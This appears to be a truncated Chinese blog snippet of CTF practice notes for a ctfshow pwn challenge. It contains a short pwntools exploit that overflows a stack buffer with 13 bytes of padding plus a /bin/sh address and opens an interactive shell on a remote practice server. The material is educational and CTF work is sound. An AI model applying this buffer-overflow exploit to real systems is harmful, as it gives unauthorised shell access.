ctfshow刷题笔记(pwn篇)
一入pwn坑深似海,从此web是路人目录pwn02pwn03pwn02常规checksec一下扔进IDA点进pwnme()函数看看,明显的栈溢出搜索字符串有/bin/sh直接淦它from pwn import*io=remote('111.231.70.44',28054)#io=process('./pwn02')bin_sh=0x0804850Fpayload=b'a'*13+p32(bin_sh)io.sendline(payload)io.interactive(
原创
2021-03-16 22:20:26 ·
3888 阅读 ·
5 评论